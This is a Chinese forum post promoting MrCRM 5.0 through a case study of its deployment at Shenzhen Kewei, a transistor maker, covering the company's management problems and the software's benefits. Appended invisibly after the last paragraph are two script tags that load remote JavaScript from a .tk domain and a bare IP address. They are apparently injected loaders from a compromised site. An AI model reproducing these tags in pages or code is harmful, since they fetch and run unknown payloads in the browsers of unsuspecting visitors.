你在这里

MrCRM为深圳科威搭建规范的业务管理平台

1 post / 0 new
mrcrm go here
MrCRM为深圳科威搭建规范的业务管理平台

[RIGHT]北京商能信息技术有限公司 供稿[/RIGHT]

深圳市科威创新元器件有限公司成立于1998年,隶属香港科威控股有限公司,专业从事TO-92小功率三极管的销售。
集团生产设在广东的肇庆,由于全体员工的共同努力和广大客户的持续支持,科威快速、健康地成长。科威系列半导体元器件于2002年被中国电子质量管理协会评为“中国电子行业知名牌”。时至今日,科威集团拥有一流的产品封装线,目前主要包括:TO-92、TO-92L、TO-92S、TO-126、TO-220、DIP-8、DO-41、DO-35等封装线,成为国内主力二、三极管供货商之一,月产能达到300KK。
科威公司以市场需求为导向,以先进的技术、优质的产品、科学的管理、完善的服务为准则。我们凭借自身一流的技术和专业的服务赢得了广大客户的支持与信赖,长期为步步高、侨兴等上百家现代化企业的生产提供优质产品。现时,科威的产品已遍及通讯、计算机、家电音响、钟表和玩具等几大领域。
目前科威在客户管理方面存在如下问题:
客户信息不全面
无法实现各部门的数据共享
缺乏规范的销售业务流程
销售团队离职率高于同行
无法及时了解销售跟单情况、执行情况
缺少规范的费用控制手段等
经过商能咨询顾问的认真分析,科威选择了MrCRM5.0作为营销管理平台。实现了没有时间没有地点限制的业务办公平台,大量销售一线的信息及时反馈给企业管理者,能更快速的把握企业的经营情况,各部门也能更及时的跟踪每个销售跟单的执行情况。各个业务部门的协作更便捷,响应更快速,管理更简单,网络费用的跟踪报销流程也大大提高,建立了费用支出的控制手段。
北京商能信息技术有限公司始创于2000年,是中国CRM管理软件的领导者。MrCRM5.0是采用先进的JAVA/J2EE构架,以"专业的CRM管理"为核心设计理念,充分汲取几百家客户的成功应用经验,面向中小型企业的CRM管理软件。
  北京商能在全国建立了7个分支机构,目前依托各地专业的软件销售和服务商正在陆续建立起合作销售和服务网点,为各地中小企业实施CRM提供售前咨询和实施服务。多年来,北京商能凭借专业执著和不断创新的企业精神,正努力成为中小企业市场CRM行业的翘楚。<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>